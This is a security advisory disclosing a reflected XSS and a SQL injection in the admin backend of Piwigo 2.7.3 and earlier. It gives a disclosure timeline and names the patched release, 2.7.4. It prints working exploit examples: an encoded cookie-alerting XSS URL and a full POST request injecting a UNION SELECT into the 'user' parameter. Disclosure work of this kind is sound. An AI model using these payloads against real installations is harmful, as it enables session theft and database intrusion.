Advisory: Reflecting XSS-and SQL Injection vulnerability in CMS Piwigo <=
v.2.7.3
Advisory ID: SROEADV-2015-06
Author: Steffen Rösemann
Affected Software: CMS Piwigo <= v.2.7.3(Release date: 9th January 2015)
Vendor URL: http://piwigo.org
Vendor Status: patched
CVE-ID:-==========================
Vulnerability Description:==========================
Piwigo <= v.2.7.3 suffers from a reflecting XSS and a SQL injection in its
administrative backend.==================
Technical Details:==================
The reflecting XSS vulnerability resides in the "page" parameter used in
the file admin.php which can be found in the administrative backend located
here in a common Piwigo installation:
http://{TARGET}/admin.php?page=plugin-AdminTools
Exploit-Example:
http://{TARGET}/admin.php?page=plugin-AdminTools%3Cimg%20src=n%20onerror=eval%28String.fromCharCode%2897,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59%29%29%20%3E
The SQL injection vulnerability can as well be found in the administrative
backend and can be found in the "History" functionality located here:
http://{TARGET}/admin.php?page=history
The SQL injection vulnerability can be exploited by appending arbitrary SQL
statements in a POST request to the parameter "user":
Exploit-Example:
POST /piwigo/admin.php?page=history HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0(X11; Linux x86_64; rv:31.0) Gecko/20100101
Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/piwigo/admin.php?page=history&search_id=82
Cookie: pwg_display_thumbnail=no_display_thumbnail;
pwg_id=19rpao6bhdsn3l0u0o1im4m680;
_pk_id.1.1fff=7588ea02f4577539.1420720532.1.1420720532.1420720532.
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length:255
start=2015-01-08+&end=2015-01-09+&types%5B%5D=none&types%5B%5D=picture&types%5B%5D=high&types%5B%5D=other&user=2)
AND 1=2 UNION SELECT user(),database(),3,version(),5,6,7,8,9--&image_id=&filename=&ip=&display_thumbnail=no_display_thumbnail&submit=Submit
=========
Solution:=========
Install the latest version 2.7.4(released 17th February 2015).====================
Disclosure Timeline:====================08-Jan-2015 – found the vulnerability
09-Jan-2015- informed the developers
09-Jan-2015 – release date of this security advisory [without technical
details]09-Jan-2015- vendor responded, will work on a patch (released in v.2.7.4)17-Feb-2015- vendor releases patch 2.7.4(see [3])17-Feb-2015- release date of this security advisory
17-Feb-2015- send to FullDisclosure
========
Credits:========
Vulnerability found and advisory written by Steffen Rösemann.===========
References:===========[1] http://piwigo.org
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-06.html
[3] http://piwigo.org/forum/viewtopic.php?id=25179
